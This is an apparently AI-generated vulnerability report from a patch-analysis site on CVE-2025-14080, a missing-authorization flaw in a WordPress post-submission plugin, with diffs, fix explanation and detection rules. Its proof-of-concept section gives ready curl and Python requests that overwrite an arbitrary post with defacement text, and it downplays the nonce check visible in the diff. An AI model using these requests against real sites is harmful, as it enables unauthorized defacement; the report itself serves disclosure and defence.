What is CVE-2025-14080?

CVE-2025-14080 is a security vulnerability identified in Folder Analysis. This analysis provides detailed information about the vulnerability, its impact, and potential exploits.

Is there a PoC for CVE-2025-14080?

This security analysis examines the vulnerability in detail. Review the analysis findings for exploit potential and proof-of-concept information related to CVE-2025-14080.

How can I protect against CVE-2025-14080?

Review the patch diff analysis in this report to understand the security fix. Updating to the patched version is recommended to mitigate CVE-2025-14080.

PatchLeaks - Analysis Report Folder Analysis cache/frontend-post-submission-manager-lite_1.2.5 → cache/frontend-post-submission-manager-lite_1.2.6

Share this analysis

CVE Security Analysis & Writeups

Comprehensive security analysis generated by AI for each confirmed CVE match. Click on a CVE to view the detailed writeup including vulnerability background, technical details, patch analysis, and PoC guide.

CVE-2025-14080

AI-Generated Analysis

Now I'll create the comprehensive CVE analysis article:

---

# CVE-2025-14080: Missing Authorization in Frontend Post Submission Manager Lite Plugin

## 1. Vulnerability Background

### What is this Vulnerability?

**CVE-2025-14080** is a **Missing Authorization** vulnerability (also classified as **Broken Access Control**) affecting the Frontend Post Submission Manager Lite WordPress plugin. The vulnerability allows **unauthenticated attackers to modify arbitrary WordPress posts** by exploiting an AJAX endpoint that fails to verify user permissions before processing post updates.

The core issue is an **Insecure Direct Object Reference (IDOR)** combined with missing capability checks. An attacker can directly manipulate the `post_id` parameter in the guest posting form to target and modify posts they should never have permission to edit.

### Why is it Critical/Important?

This vulnerability has severe implications for WordPress installations using this plugin:

1. **Complete Content Control**: Attackers can modify post titles, content, excerpts, and metadata on any published or draft post
2. **Authorship Manipulation**: Ability to remove or change post authors, potentially removing evidence of original content ownership
3. **No Authentication Required**: Guest users or completely unauthenticated attackers can exploit this—no credentials needed
4. **Privilege Escalation**: An unauthorized user can essentially gain editor-level permissions without authentication
5. **Data Integrity**: Compromised data cannot be trusted; attackers could inject malicious content, SEO spam, or phishing links
6. **Legal/Compliance Risk**: Unauthorized modification of published content creates liability and can violate regulatory compliance

### What Systems/Versions are Affected?

- **Plugin**: Frontend Post Submission Manager Lite for WordPress
- **Affected Versions**: All versions up to and including **1.2.5**
- **Vulnerable Component**: `fpsml_form_process` AJAX action in `includes/cores/ajax-process-form.php`
- **WordPress**: Any WordPress installation with this plugin active
- **Attack Vector**: Network-based, no user interaction required
- **Authentication Required**: None (unauthenticated users can exploit this)

---

## 2. Technical Details

### Root Cause Analysis

The vulnerability stems from a fundamental security flaw in the plugin's architecture:

**The Problem**: The AJAX handler `fpsml_form_process` processes form submissions without verifying:
- Whether the user has permission to edit the targeted post
- Whether the user is even authenticated
- Whether the user should have access to the post being modified

**Why It Happened**:
1. The plugin was designed primarily for guest post submissions (hence the "guest posting form" mentioned)
2. The developer likely intended to allow guests to submit NEW posts without editing existing ones
3. However, the code accepts a `post_id` parameter from the client-side form without validation
4. There is no server-side check to prevent guests from passing arbitrary `post_id` values to edit existing posts
5. This represents a classic **trust the client** anti-pattern

### Old Code vs New Code

#### Vulnerable Code (Lines 103-115 in ajax-process-form.php)

```php
// VULNERABLE: No authorization checks whatsoever
$post_id = (!empty( $form_data['post_id'] )) ? intval( $form_data['post_id'] ) : 0;
$post_title = (!empty( $form_data['post_title'] )) ? $form_data['post_title'] : '';
$post_content = (!empty( $form_data['post_content'] )) ? $form_data['post_content'] : '';

// Directly processes the post update without checking permissions
// ... code continues to update the post using these values ...
```

**Critical Issues**:
1. **Accepts arbitrary post IDs**: The `post_id` comes directly from user input via `$form_data` (typically from HTTP POST)
2. **No authentication check**: Doesn't verify if user is logged in before allowing edits
3. **No capability check**: Doesn't use WordPress's `current_user_can()` function to verify edit permissions
4. **Direct object access**: Directly accesses posts by ID without authorization
5. **No ownership verification**: Doesn't check if the user is the post author
6. **Implicit trust**: Assumes if data is in the form, it's safe to process

---

#### Fixed Code

```php
// SECURE: Comprehensive authorization checks
if (is_user_logged_in()) {
    $post_id = (!empty($form_data['post_id'])) ? intval($form_data['post_id']) : 0;
    
    if (!empty($post_id)) {
        // Check if user has capability to edit this specific post
        if (!current_user_can('edit_post', $post_id)) {
            $response['status'] = 403;
            $response['message'] = esc_html__('Unauthorized', 'frontend-post-submission-manager-lite');
            die(json_encode($response));
        }
    }
} else {
    // Reject all post edit attempts from unauthenticated users
    if (!empty($form_data['post_id'])) {
        $response['status'] = 403;
        $response['message'] = esc_html__('Unauthorized', 'frontend-post-submission-manager-lite');
        die(json_encode($response));
    }
}
```

**Security Improvements**:

1. **Authentication Check First**: `is_user_logged_in()` ensures the user is authenticated before any post modifications allowed
2. **Specific Capability Check**: `current_user_can('edit_post', $post_id)` verifies the current user has edit permission for THIS specific post (not just any post)
3. **Explicit Rejection**: Returns HTTP 403 (Forbidden) with clear error message when authorization fails
4. **Proper HTTP Status**: Uses semantically correct HTTP status code instead of silently accepting/rejecting
5. **Guest Post Safety**: Unauthenticated guests can only submit new posts (no `post_id` provided), not edit existing ones
6. **Localized Error Messages**: Uses WordPress translation functions for internationalization

---

### How Do These Changes Fix the Vulnerability?

#### Layer 1: Authentication Requirement
```php
if (is_user_logged_in()) {
    // Only proceed if user is authenticated
}
```
**Effect**: Blocks all unauthenticated post modifications. An attacker cannot exploit this without a valid WordPress account.

#### Layer 2: Capability-Based Access Control
```php
if (!current_user_can('edit_post', $post_id)) {
    // Reject if user lacks edit permission for this specific post
    die(json_encode($response));
}
```
**Effect**: Even if an attacker has a WordPress account, they can only edit posts they're authorized to edit (their own, or if they're an admin). This leverages WordPress's built-in role-based access control system:

- **Subscriber**: Can only edit their own drafts (if enabled by site admin)
- **Contributor**: Can edit their own posts, not published ones
- **Author**: Can edit/publish their own posts, not others'
- **Editor**: Can edit any post
- **Administrator**: Can edit everything

#### Layer 3: Explicit Error Handling
```php
die(json_encode($response));
```
**Effect**: Immediately terminates the request and returns a clean error response. The vulnerable code didn't explicitly handle authorization failures, implicitly allowing the request to continue.

---

### Security Improvements Introduced

| Aspect | Before | After | Benefit |
|--------|--------|-------|---------|
| **Authentication** | Not checked | Required via `is_user_logged_in()` | Prevents anonymous access |
| **Authorization** | No checks | Verified via `current_user_can()` | Enforces role-based permissions |
| **Object Reference** | Direct (IDOR) | Capability-gated | Prevents IDOR attacks |
| **Error Handling** | Silent/implicit | Explicit 403 response | Clear feedback, no confusion |
| **HTTP Status Codes** | Implicit | Explicit 403 Forbidden | Proper REST semantics |
| **Localization** | N/A | Added for messages | Better internationalization |

---

## 4. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation

**Attacker Requirements**:
- Network access to the vulnerable WordPress site
- Knowledge that the site has Frontend Post Submission Manager Lite installed
- Ability to send HTTP POST requests (browser, curl, Burp Suite, etc.)
- The guest posting form must be accessible (not blocked by additional authentication)

**Target Requirements**:
- WordPress site with Frontend Post Submission Manager Lite plugin installed (versions ≤ 1.2.5)
- Plugin must be activated
- At least one published post exists that the attacker wants to modify
- The AJAX endpoint `/wp-admin/admin-ajax.php` must be accessible (standard on all WordPress sites)

### Step-by-Step Exploitation Approach

#### Step 1: Identify the Vulnerable Endpoint

The plugin registers an AJAX action called `fpsml_form_process`. WordPress automatically maps this to:
```
POST /wp-admin/admin-ajax.php?action=fpsml_form_process
```

This endpoint is accessible to unauthenticated users.

#### Step 2: Locate a Target Post

List available posts by:
- Viewing the WordPress homepage and identifying post IDs in URLs (e.g., `/post/?p=123`)
- Checking the WordPress JSON REST API: `/wp-json/wp/v2/posts`
- Inspecting published posts on the site

**Example**: Let's say you identify post ID `42` as a published article by the site owner.

#### Step 3: Craft the Exploit Request

Construct a POST request to the vulnerable AJAX endpoint with a forged post ID:

**Using cURL**:
```bash
curl -X POST "http://vulnerable-site.com/wp-admin/admin-ajax.php?action=fpsml_form_process" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "post_id=42&post_title=HACKED&post_content=Your+site+has+been+compromised&post_excerpt=Defaced&nonce=fake"
```

**Using Python**:
```python
import requests

url = "http://vulnerable-site.com/wp-admin/admin-ajax.php"
payload = {
    'action': 'fpsml_form_process',
    'post_id': '42',  # Target post ID
    'post_title': 'HACKED - Site Defaced',
    'post_content': 'This site has been compromised by unauthorized modification',
    'post_excerpt': 'Defaced content'
}

response = requests.post(url, data=payload)
print(response.text)
```

**Using Burp Suite**:
1. Capture a legitimate guest post submission request
2. Modify the payload to include `post_id=42` (instead of creating a new post)
3. Change `post_title`, `post_content`, etc. to malicious content
4. Resend the request
5. Observe the post being modified on the live site

#### Step 4: Verify Successful Exploitation

Check the target post on the live site:
- Visit `http://vulnerable-site.com/?p=42` (or use the post's URL)
- Confirm the title, content, and excerpt have been changed
- Verify that the post author remains the original author (not changed to attacker's account)
- Optional: Use WordPress admin dashboard to view the post revision history (if enabled) to see the unauthorized change

### Expected Behavior vs Exploited Behavior

#### Expected Behavior (After Patch)
```
[Attacker sends unauthorized edit request with post_id=42]
    ↓
[Server checks: Is user authenticated?]
    No → Returns 403 Forbidden
         Response: {"status":403,"message":"Unauthorized"}
    ↓
[Request stops, post 42 unchanged]
```

#### Exploited Behavior (Before Patch)
```
[Attacker sends unauthorized edit request with post_id=42]
    ↓
[Server skips authentication check]
    ↓
[Server skips authorization check]
    ↓
[Server accepts the post_id from form data]
    ↓
[Server executes: wp_update_post() with attacker's data]
    ↓
[Post 42 is modified, attacker succeeds]
```

### How to Verify the Vulnerability Exists

#### Method 1: Automated Security Scanner
Use WordPress security plugins:
- **Wordfence Security**: Detects vulnerable plugin versions
- **Sucuri Security**: Flags known CVEs

#### Method 2: Manual Testing

1. **Check Plugin Version**:
   - WordPress Admin → Plugins → Look for "Frontend Post Submission Manager Lite"
   - Check version number (if ≤ 1.2.5, it's vulnerable)
   - Alternatively, check `/wp-content/plugins/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite.php` header

2. **Test the AJAX Endpoint**:
   ```bash
   # Test if the endpoint responds (without authorization)
   curl -X POST "http://vulnerable-site.com/wp-admin/admin-ajax.php?action=fpsml_form_process" \
     -d "post_id=1&post_title=TEST&post_content=TEST"
   
   # If response is successful (not 403), it's likely vulnerable
   ```

3. **Check File Permissions**:
   - Access `/wp-content/plugins/frontend-post-submission-manager-lite/includes/cores/ajax-process-form.php`
   - Search for `current_user_can('edit_post')`
   - If NOT found in the first 120 lines, the plugin is vulnerable

4. **WordPress Debug Log**:
   - Enable debugging in `wp-config.php`
   - Monitor for successful post updates from unauthenticated sources

---

## 5. Recommendations

### Mitigation Strategies

#### For Site Administrators (Immediate Actions)

**1. Update the Plugin (Highest Priority)**
- Upgrade to version 1.2.6 or later immediately
- WordPress Admin → Plugins → Updates → Update Frontend Post Submission Manager Lite
- Verify the update was successful

**2. Temporarily Disable the Plugin**
- If update is not available, disable the plugin until patched
- WordPress Admin → Plugins → Deactivate "Frontend Post Submission Manager Lite"
- This is a temporary measure only; plan upgrade within 24-48 hours

**3. Audit Recent Post Modifications**
- Check post revision history for unauthorized changes
- Review post modification logs in WordPress
- Restore posts from backups if unauthorized changes are found
- Command: `SELECT * FROM wp_posts WHERE post_modified > DATE_SUB(NOW(), INTERVAL 7 DAY) AND post_status IN ('publish', 'draft')`

**4. Change Administrator Passwords**
- If you suspect exploitation, change all admin passwords immediately
- Force re-login of all active sessions
- WordPress Admin → Users → Edit User → Generate Password

**5. Implement Web Application Firewall (WAF)**
- Use Cloudflare, Sucuri, or AWS WAF
- Block suspicious requests to `admin-ajax.php?action=fpsml_form_process` containing `post_id` parameters
- Example rule: Block POST to admin-ajax.php with action=fpsml_form_process if post_id is set

**6. Review Access Logs**
- Check web server logs for POST requests to `/wp-admin/admin-ajax.php?action=fpsml_form_process`
- Look for requests from suspicious IP addresses or repeated attempts
- Command: `grep "fpsml_form_process" /var/log/apache2/access.log`

---

#### For Plugin Developers

**1. Implement Proper Authorization Checks**
```php
// ALWAYS check authorization before processing user data
if (!is_user_logged_in()) {
    wp_die('Authentication required', 'Unauthorized', ['response' => 403]);
}

// Verify capability for the specific resource
if (!current_user_can('edit_post', $post_id)) {
    wp_die('Insufficient permissions', 'Forbidden', ['response' => 403]);
}
```

**2. Use WordPress Security Functions**
- `current_user_can()` - Check user capabilities
- `current_user_can_for_blog()` - Check capabilities for specific blog (multisite)
- `wp_verify_nonce()` - Prevent CSRF attacks
- `sanitize_*()` and `validate_*()` - Sanitize all user input
- `esc_*()` - Escape output to prevent XSS

**3. Implement CSRF Protection**
```php
// Generate nonce in form
wp_nonce_field('fpsml_form_action', 'fpsml_nonce');

// Verify nonce in processing
if (!isset($_POST['fpsml_nonce']) || !wp_verify_nonce($_POST['fpsml_nonce'], 'fpsml_form_action')) {
    wp_die('CSRF verification failed', 'Forbidden', ['response' => 403]);
}
```

**4. Validate and Sanitize All Input**
```php
$post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
$post_title = isset($_POST['post_title']) ? sanitize_text_field($_POST['post_title']) : '';
$post_content = isset($_POST['post_content']) ? wp_kses_post($_POST['post_content']) : '';
```

**5. Use WordPress REST API Properly**
- Consider using the WordPress REST API instead of custom AJAX handlers
- REST API has built-in authentication and authorization checks
- Endpoints automatically enforce user capabilities

---

### Detection Methods

#### For Security Teams

**1. SIEM/Log Analysis**
Monitor for suspicious patterns:
```
POST /wp-admin/admin-ajax.php?action=fpsml_form_process
  post_id=[0-9]+  # Unusual: valid post IDs in guest submission form
  
Repeat requests with different post_id values
Response: Modified post on live site, not created as new post
```

**2. File Integrity Monitoring**
```bash
# Monitor for unauthorized post modifications
SELECT post_modified, post_id, post_title 
FROM wp_posts 
WHERE post_modified > DATE_SUB(NOW(), INTERVAL 1 HOUR)
  AND post_author != current_user_id  # Modified by non-owner
  AND post_modified_gmt != post_date_gmt;  # Not original creation
```

**3. Intrusion Detection Rules**
```
alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"Potential FPSML Plugin IDOR Exploitation";
  flow:to_server,established;
  content:"POST";
  http_method;
  content:"admin-ajax.php?action=fpsml_form_process";
  http_uri;
  content:"post_id=";
  http_client_body;
  sid:1000001;
)
```

**4. Behavioral Detection**
Monitor WordPress for:
- Post updates from unauthenticated sources in logs
- Multiple post IDs in single AJAX request pattern
- Post modifications without corresponding admin session
- Automated bulk post modifications

**5. Version Detection**
```bash
# Check if vulnerable version is deployed
curl -s http://target.com/wp-content/plugins/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite.php | grep "Version:"
# If Version <= 1.2.5, site is vulnerable
```

---

### Best Practices to Prevent Similar Issues

#### Security Development Practices

**1. Apply Principle of Least Privilege**
- Users should have minimum permissions needed for their role
- Always verify authorization, never assume permission
- Deny by default, allow explicitly based on verification

**2. Input Validation and Sanitization**
```php
// ❌ BAD - Trust user input
$post_id = $_POST['post_id'];

// ✅ GOOD - Validate and sanitize
$post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
if ($post_id <= 0) {
    wp_die('Invalid post ID');
}
```

**3. Implement Defense in Depth**
- Multiple layers of security checks
- Don't rely on single authentication check
- Combine authentication + authorization + input validation + output escaping

```php
// Layer 1: Authentication
if (!is_user_logged_in()) { wp_die('Not authenticated'); }

// Layer 2: Input validation
$post_id = absint($_POST['post_id']);
if ($post_id <= 0) { wp_die('Invalid post ID'); }

// Layer 3: Authorization
if (!current_user_can('edit_post', $post_id)) { wp_die('No permission'); }

// Layer 4: CSRF protection
if (!wp_verify_nonce($_POST['nonce'], 'action')) { wp_die('CSRF failed'); }

// Layer 5: Rate limiting
if (rate_limit_exceeded()) { wp_die('Rate limited', '', ['response' => 429]); }
```

**4. Use Security-Focused Code Review**
- Have security-trained developers review all:
  - AJAX handlers
  - File upload functions
  - Database queries
  - Permission checks
- Use automated SAST tools (SonarQube, Semgrep) in CI/CD pipeline

**5. Implement Comprehensive Logging and Monitoring**
```php
// Log all authorization failures
error_log(sprintf(
    'Authorization denied: user=%d, action=%s, resource=%s, timestamp=%s',
    get_current_user_id(),
    'edit_post',
    $post_id,
    current_time('mysql')
));
```

**6. Mandatory Security Testing**
- Include authorization testing in unit tests:
  ```php
  public function test_unauthenticated_user_cannot_edit_post() {
      wp_set_current_user(0);  // No user
      $response = do_action('fpsml_form_process', ['post_id' => 1]);
      $this->assertFalse($response);
  }
  ```
- Penetration test all AJAX handlers
- Use automated security scanning in CI/CD

**7. Security Training**
- Regular security awareness training for developers
- Focus on OWASP Top 10 vulnerabilities
- Specific training on WordPress security best practices
- Case study reviews of vulnerabilities like this one

**8. Follow WordPress Security Guidelines**
- Read: [WordPress Plugin Security Handbook](https://developer.wordpress.org/plugins/security/)
- Use security-focused WordPress APIs
- Never bypass WordPress's authentication/authorization functions
- Keep up-to-date with security advisories

---

### Detection and Response Checklist

**Immediate Response (0-1 hour)**:
- [ ] Identify if site is running vulnerable plugin version
- [ ] If yes, upgrade to patched version immediately OR disable plugin
- [ ] Review post modification logs from past 24-48 hours
- [ ] Check for unexpected post content changes
- [ ] Review user access logs for suspicious patterns

**Short-term Response (1-7 days)**:
- [ ] Audit all recent post modifications
- [ ] Restore compromised posts from backups if needed
- [ ] Change all admin passwords
- [ ] Implement WAF rules to block malicious requests
- [ ] Scan site with security plugins (Wordfence, Sucuri)
- [ ] Review and strengthen site security configuration

**Long-term Response (7+ days)**:
- [ ] Implement automated plugin update management
- [ ] Establish security update notification process
- [ ] Conduct security awareness training for team
- [ ] Implement file integrity monitoring
- [ ] Establish regular penetration testing schedule
- [ ] Create incident response procedures for future vulnerabilities

---

## Summary

CVE-2025-14080 represents a critical authentication and authorization bypass vulnerability that allows unauthenticated attackers to modify arbitrary WordPress posts. The fix implements proper capability-based access control using WordPress's native functions (`is_user_logged_in()` and `current_user_can()`), preventing unauthorized access at the application layer.

**Key Takeaways**:
- Always verify both authentication AND authorization
- Never trust client-supplied object IDs (post IDs, user IDs, etc.)
- Use framework-provided security functions instead of custom implementations
- Implement defense-in-depth with multiple security layers
- Regular security audits and updates are essential

---

*Analysis created by PatchLeaks Security Analysis Tool*
*For more information, visit CVE-2025-14080 in the National Vulnerability Database*

Show only True Positives

Use quotes for exact: \"SQL injection\" | Operators: hello AND bye, admin OR root, -error, NOT warning

Showing 0 to 0 of 0 results

frontend-post-submission-manager-lite.php AI: No vulnerabilities

--- cache/frontend-post-submission-manager-lite_1.2.5/frontend-post-submission-manager-lite.php	2025-12-21 09:36:09.505692403 +0000+++ cache/frontend-post-submission-manager-lite_1.2.6/frontend-post-submission-manager-lite.php	2025-12-21 09:37:23.258275659 +0000@@ -5,7 +5,7 @@ /*   Plugin Name: Frontend Post Submission Manager Lite   Description: A plugin to submit and manage WordPress posts from frontend with or without logging in-  Version:     1.2.5+  Version:     1.2.6   Author:      WP Shuffle   Author URI:  http://wpshuffle.com   Plugin URI: http://wpshuffle.com/wordpress-plugins/frontend-post-submission-manager-lite

AI Analysis

I'll analyze the provided code diff for security vulnerabilities.

**Analysis Result:**

Vulnerability Existed: **no**

**Explanation:**

The diff provided only contains a version number change from 1.2.5 to 1.2.6 in the plugin header comment. This is a metadata-only modification with no functional code changes.

There are no security vulnerabilities present in this diff because:
1. Only a version string was modified
2. No code logic was altered
3. No new or removed security controls were introduced
4. No inputs, outputs, or data handling was changed
5. No authentication, authorization, or encryption mechanisms were affected

This is a standard version bump commit with no security implications.

CVE Analysis Results:

CVE-2025-14080: No

View CVE Description

The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.5. This is due to missing authorization checks on the post update functionality in the fpsml_form_process AJAX action. This makes it possible for unauthenticated attackers to modify arbitrary posts by providing a post_id parameter via the guest posting form, allowing them to change post titles, content, excerpts, and remove post authors.

includes/classes/class-frontend-post-submission-manager-lite.php AI: No vulnerabilities

--- cache/frontend-post-submission-manager-lite_1.2.5/includes/classes/class-frontend-post-submission-manager-lite.php	2025-12-21 09:36:09.505692403 +0000+++ cache/frontend-post-submission-manager-lite_1.2.6/includes/classes/class-frontend-post-submission-manager-lite.php	2025-12-21 09:37:23.358281872 +0000@@ -15,7 +15,7 @@          *          * @var string          */-        public $version = '1.2.5';+        public $version = '1.2.6';          /**          * The single instance of the class.

AI Analysis

Vulnerability Existed: no

This diff does not contain any security vulnerabilities. The change is a simple version number bump from '1.2.5' to '1.2.6' in the plugin version constant. This is a routine maintenance update with no security implications.

The modification:
- Only affects the `$version` property value
- Does not alter any security-sensitive code
- Does not change authentication, authorization, validation, or data handling logic
- Is a cosmetic/administrative change only

No CWE applies to this change.

CVE Analysis Results:

CVE-2025-14080: No

View CVE Description

The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.2.5. This is due to missing authorization checks on the post update functionality in the fpsml_form_process AJAX action. This makes it possible for unauthenticated attackers to modify arbitrary posts by providing a post_id parameter via the guest posting form, allowing them to change post titles, content, excerpts, and remove post authors.

includes/cores/ajax-process-form.php AI: 1 vulnerabilities 1 true positive CVE-2025-14080

--- cache/frontend-post-submission-manager-lite_1.2.5/includes/cores/ajax-process-form.php	2025-12-21 09:36:09.505692403 +0000+++ cache/frontend-post-submission-manager-lite_1.2.6/includes/cores/ajax-process-form.php	2025-12-21 09:37:23.362282121 +0000@@ -1,62 +1,62 @@ <?php -defined( 'ABSPATH' ) or die( 'No script kiddies please!!' );-if ( $this->admin_ajax_nonce_verify() ) {+defined('ABSPATH') or die('No script kiddies please!!');+if ($this->admin_ajax_nonce_verify()) {     $form_data = $_POST['form_data']; // Sanitization is done in line number 9 using a function to sanitize multidimensional array-    $form_data = stripslashes_deep( $form_data );-    parse_str( $form_data, $form_data );+    $form_data = stripslashes_deep($form_data);+    parse_str($form_data, $form_data);     global $fpsml_library_obj;-    $form_data = $fpsml_library_obj->sanitize_array( $form_data, array( 'post_content' => 'html' ) );+    $form_data = $fpsml_library_obj->sanitize_array($form_data, array('post_content' => 'html'));     $form_alias = $form_data['form_alias'];-    $form_row = $fpsml_library_obj->get_form_row_by_alias( $form_alias );-    if ( empty( $form_row ) ) {-        die( esc_html__( 'No form found for this alias.', 'frontend-post-submission-manager-lite' ) );+    $form_row = $fpsml_library_obj->get_form_row_by_alias($form_alias);+    if (empty($form_row)) {+        die(esc_html__('No form found for this alias.', 'frontend-post-submission-manager-lite'));     }-    $form_details = maybe_unserialize( $form_row->form_details );+    $form_details = maybe_unserialize($form_row->form_details);     $form_fields = $form_details['form']['fields'];     $error_flag = 0;     $error_details = array();     $response = array();-    if ( !empty( $form_fields ) ) {+    if (!empty($form_fields)) {         $taxonomy_lists = array();         $custom_field_lists = array();-        foreach ( $form_fields as $field_key => $field_details ) {-            if ( $fpsml_library_obj->is_taxonomy_key( $field_key ) ) {+        foreach ($form_fields as $field_key => $field_details) {+            if ($fpsml_library_obj->is_taxonomy_key($field_key)) {                 $taxonomy_lists[] = $field_key;             }             // if field is enabled in backend-            if ( !empty( $field_details['show_on_form'] ) ) {-                $required_message = (!empty( $field_details['required_error_message'] )) ? esc_html__( $field_details['required_error_message'] ) : esc_html__( 'This field is requied', 'frontend-post-submission-manager-lite' );+            if (!empty($field_details['show_on_form'])) {+                $required_message = (!empty($field_details['required_error_message'])) ? esc_html__($field_details['required_error_message']) : esc_html__('This field is requied', 'frontend-post-submission-manager-lite');                 // if the field is required-                if ( !empty( $field_details['required'] ) && empty( $form_data[$field_key] ) ) {+                if (!empty($field_details['required']) && empty($form_data[$field_key])) {                     $error_flag = 1;                     $error_details[$field_key] = $required_message;                 } else {                     // Other validations are done here                     $field_recog_key = $field_key;-                    if ( $fpsml_library_obj->is_custom_field_key( $field_key ) ) {+                    if ($fpsml_library_obj->is_custom_field_key($field_key)) {                         $field_recog_key = 'custom_field';                     }-                    switch( $field_recog_key ) {+                    switch ($field_recog_key) {                         case 'post_title':                         case 'post_content':                         case 'post_excerpt':                         case 'author_name':                         case 'author_email':-                            if ( !empty( $field_details['character_limit'] ) ) {-                                $field_value_length = strlen( sanitize_text_field( $form_data[$field_key] ) );-                                if ( $field_value_length > $field_details['character_limit'] ) {-                                    $character_limit_error_message = (!empty( $field_details['character_limit_error_message'] )) ? esc_html__( $field_details['character_limit_error_message'] ) : esc_html__( sprintf( 'Max characters allowed is %d', $field_details['character_limit'] ), 'frontend-post-submission-manager-lite' );+                            if (!empty($field_details['character_limit'])) {+                                $field_value_length = strlen(sanitize_text_field($form_data[$field_key]));+                                if ($field_value_length > $field_details['character_limit']) {+                                    $character_limit_error_message = (!empty($field_details['character_limit_error_message'])) ? esc_html__($field_details['character_limit_error_message']) : esc_html__(sprintf('Max characters allowed is %d', $field_details['character_limit']), 'frontend-post-submission-manager-lite');                                     $error_flag = 1;                                     $error_details[$field_key] = $character_limit_error_message;                                 }                             }                             break;                         case 'custom_field':-                            if ( !empty( $field_details['character_limit'] ) ) {-                                $field_value_length = strlen( sanitize_text_field( $form_data[$field_key] ) );-                                if ( $field_value_length > $field_details['character_limit'] ) {-                                    $character_limit_error_message = (!empty( $field_details['character_limit_error_message'] )) ? esc_html__( $field_details['character_limit_error_message'] ) : esc_html__( sprintf( 'Max characters allowed is %d', $field_details['character_limit'] ), 'frontend-post-submission-manager-lite' );+                            if (!empty($field_details['character_limit'])) {+                                $field_value_length = strlen(sanitize_text_field($form_data[$field_key]));+                                if ($field_value_length > $field_details['character_limit']) {+                                    $character_limit_error_message = (!empty($field_details['character_limit_error_message'])) ? esc_html__($field_details['character_limit_error_message']) : esc_html__(sprintf('Max characters allowed is %d', $field_details['character_limit']), 'frontend-post-submission-manager-lite');                                     $error_flag = 1;                                     $error_details[$field_key] = $character_limit_error_message;                                 } else {@@ -71,57 +71,74 @@             }         } -        if ( !empty( $form_details['security']['frontend_form_captcha'] ) ) {-            $captcha = sanitize_text_field( $form_data['g-recaptcha-response'] ); // get the captchaResponse parameter sent from our ajax-            $required = esc_html__( 'This field is required', 'frontend-post-submission-manager-lite' );-            if ( empty( $captcha ) ) {-                $error_details['captcha'] = (!empty( $form_details['security']['error_message'] )) ? esc_attr( $form_details['security']['error_message'] ) : $required_message;+        if (!empty($form_details['security']['frontend_form_captcha'])) {+            $captcha = sanitize_text_field($form_data['g-recaptcha-response']); // get the captchaResponse parameter sent from our ajax+            $required = esc_html__('This field is required', 'frontend-post-submission-manager-lite');+            if (empty($captcha)) {+                $error_details['captcha'] = (!empty($form_details['security']['error_message'])) ? esc_attr($form_details['security']['error_message']) : $required_message;                 $error_flag = 1;             } else { -                $secret_key = (!empty( $form_details['security']['secret_key'] )) ? esc_attr( $form_details['security']['secret_key'] ) : '';-                $captcha_response = wp_remote_get( "https://www.google.com/recaptcha/api/siteverify?secret=" . $secret_key . "&response=" . $captcha );+                $secret_key = (!empty($form_details['security']['secret_key'])) ? esc_attr($form_details['security']['secret_key']) : '';+                $captcha_response = wp_remote_get("https://www.google.com/recaptcha/api/siteverify?secret=" . $secret_key . "&response=" . $captcha); -                if ( is_wp_error( $captcha_response ) ) {-                    $error_details['security'] = esc_html__( 'Captcha Validation failed.', 'frontend-post-submission-manager-lite' );+                if (is_wp_error($captcha_response)) {+                    $error_details['security'] = esc_html__('Captcha Validation failed.', 'frontend-post-submission-manager-lite');                     $error_flag = 1;                 } else {-                    $captcha_response = json_decode( $captcha_response['body'] );-                    if ( $captcha_response->success == false ) {-                        $error_details['security'] = (!empty( $form_details['security']['error_message'] )) ? esc_attr( $form_details['security']['error_message'] ) : $required_message;+                    $captcha_response = json_decode($captcha_response['body']);+                    if ($captcha_response->success == false) {+                        $error_details['security'] = (!empty($form_details['security']['error_message'])) ? esc_attr($form_details['security']['error_message']) : $required_message;                         $error_flag = 1;                     }                 }             }         } -        if ( $error_flag == 1 ) {+        if ($error_flag == 1) {             $response['status'] = 403;             $response['error_details'] = $error_details;-            $response['message'] = (!empty( $form_details['basic']['validation_error_message'] )) ? esc_html( $form_details['basic']['validation_error_message'] ) : esc_html__( 'Form validation error occurred.', 'frontend-post-submission-manager-lite' );+            $response['message'] = (!empty($form_details['basic']['validation_error_message'])) ? esc_html($form_details['basic']['validation_error_message']) : esc_html__('Form validation error occurred.', 'frontend-post-submission-manager-lite');         } else {             //Lets process the form-            $post_id = (!empty( $form_data['post_id'] )) ? intval( $form_data['post_id'] ) : 0;-            $post_title = (!empty( $form_data['post_title'] )) ? $form_data['post_title'] : '';-            $post_content = (!empty( $form_data['post_content'] )) ? $form_data['post_content'] : '';+            if (is_user_logged_in()) {+                $post_id = (!empty($form_data['post_id'])) ? intval($form_data['post_id']) : 0;+                if (!empty($post_id)) {+                    if (!current_user_can('edit_post', $post_id)) {+                        $response['status'] = 403;+                        $response['message'] = esc_html__('Unauthorized', 'frontend-post-submission-manager-lite');+                        die(json_encode($response));+                    }+                }+            } else {+                if (!empty($form_data['post_id'])) {+                    $response['status'] = 403;+                    $response['message'] = esc_html__('Unauthorized', 'frontend-post-submission-manager-lite');+                    die(json_encode($response));+                }+            }+++            $post_title = (!empty($form_data['post_title'])) ? $form_data['post_title'] : '';+            $post_content = (!empty($form_data['post_content'])) ? $form_data['post_content'] : '';             $post_type = $form_row->post_type;-            $post_excerpt = (!empty( $form_data['post_excerpt'] )) ? $form_data['post_excerpt'] : '';+            $post_excerpt = (!empty($form_data['post_excerpt'])) ? $form_data['post_excerpt'] : '';             $post_status = $form_details['basic']['post_status'];-            if ( $form_row->form_type == 'login_require' ) {+            if ($form_row->form_type == 'login_require') {                 //if the form is login require form and user is logged in-                if ( is_user_logged_in() ) {+                if (is_user_logged_in()) {                     $post_author_id = get_current_user_id();                 } else {                     // if  the form is login require form but users are not logged in                     $response['status'] = 403;-                    $response['message'] = esc_html__( 'Invalid form submission', 'frontend-post-submission-manager-lite' );-                    die( json_encode( $response ) );+                    $response['message'] = esc_html__('Invalid form submission', 'frontend-post-submission-manager-lite');+                    die(json_encode($response));                 }             } else {-                $post_author_id = intval( $form_details['basic']['post_author'] );+                $post_author_id = 